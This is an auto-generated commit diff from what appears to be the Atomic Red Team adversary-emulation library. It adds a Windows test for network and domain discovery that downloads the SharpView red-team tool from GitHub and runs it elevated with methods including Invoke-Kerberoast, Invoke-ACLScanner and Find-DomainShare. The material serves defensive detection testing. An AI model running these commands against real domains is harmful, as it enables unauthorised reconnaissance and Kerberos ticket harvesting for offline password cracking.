Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -660,6 +660,7 @@ discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
+discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -465,6 +465,7 @@ discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Acti
 discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
+discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1155,6 +1155,7 @@
   - Atomic Test #1: System Network Connections Discovery [windows]
   - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
   - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
+  - Atomic Test #4: System Discovery using SharpView [windows]
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
   - Atomic Test #1: System Owner/User Discovery [windows]
   - Atomic Test #2: System Owner/User Discovery [linux, macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -851,6 +851,7 @@
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #1: System Network Connections Discovery [windows]
   - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
+  - Atomic Test #4: System Discovery using SharpView [windows]
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
   - Atomic Test #1: System Owner/User Discovery [windows]
   - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]

atomics/Indexes/index.yaml

@@ -47701,6 +47701,48 @@ discovery:
           netstat
           who -a
         name: sh
+    - name: System Discovery using SharpView
+      auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
+      description: "Get a listing of network connections, domains, domain users, and
+        etc.  \nsharpview.exe located in the bin folder, an opensource red-team tool.\nUpon
+        successful execution, cmd.exe will execute sharpview.exe <method>. Results
+        will output via stdout.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        SharpView_url:
+          description: sharpview download URL
+          type: url
+          default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true
+        SharpView:
+          description: Path of the executable opensource redteam tool used for the
+            performing this atomic.
+          type: path
+          default: PathToAtomicsFolder\T1049\bin\SharpView.exe
+        syntax:
+          description: Arguements method used along with SharpView to get listing
+            of network connections, domains, domain users, and etc.
+          type: String
+          default: "\"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\"
+            \n"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView})
+
+'
+        prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $syntaxList = #{syntax}
+          foreach ($syntax in $syntaxList) {
+          #{SharpView} $syntax -}
   T1033:
     technique:
       created: '2017-05-31T21:30:35.733Z'

atomics/T1049/T1049.md

@@ -14,6 +14,8 @@ Utilities and commands that acquire this information include [netstat](https://a
 
 - [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos)
 
+- [Atomic Test #4 - System Discovery using SharpView](#atomic-test-4---system-discovery-using-sharpview)
+
 
 <br/>
 
@@ -107,4 +109,52 @@ echo "Install netstat on the machine."; exit 1;
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - System Discovery using SharpView
+Get a listing of network connections, domains, domain users, and etc.  
+sharpview.exe located in the bin folder, an opensource red-team tool.
+Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true|
+| SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder&#92;T1049&#92;bin&#92;SharpView.exe|
+| syntax | Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. | String | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$syntaxList = #{syntax}
+foreach ($syntax in $syntaxList) {
+#{SharpView} $syntax -}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{SharpView}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
+```
+
+
+
+
 <br/>